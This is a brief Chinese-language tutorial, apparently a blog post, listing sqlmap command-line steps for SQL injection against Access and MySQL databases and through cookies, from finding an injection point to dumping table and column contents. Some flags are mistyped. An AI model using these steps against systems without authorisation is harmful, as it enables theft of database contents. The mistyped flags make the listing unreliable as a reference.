利用sqlmap進行Access和Mysql注入

sqlmap將檢測結果保存到C:\Users\Administrator.sqlmap\output (windows)
linux:(/root/.sqlmap/output)

Access注入
1.檢測是否存在注入點
2.--tables 檢測表名
3.--columns -T 「表名」檢測那個表中的字段
4.--dump -C "字段名" -T 」表名「 檢測那個表中那個字段中的內容
mysql注入
1.檢測是否存在注入點
2.--dbs 當前全部數據庫
3.--current -db 當前正在使用的數據庫
4.--current -user 檢測當前用戶
5.--version 檢測版本信息
6.--is-dba 檢測當前用戶是否爲數據庫管理員
7.之後步驟依照Access注入，-D 指定數據庫
Cookie注入
1.檢測注入點 --cookie "id=16"--level 2
level 最多5級 risk 最多三級
level 指定探測等級
level 1， 探測GTE,POST
level 2 探測Cookie數據
2.--cookie 「id=16」--level 2 --tables 檢測表名
3.--cookie 「id=16」--level 2 --columns -T "表名「 檢測那個表中的字段名
4.--cookie 「id=16」--level 2 --dump -C 」那個字段「 -T "表名「 檢測那個表中那個字段中的內容
【本人不保證技術的實用性，一切文章僅供參考，若有謬錯，請留言】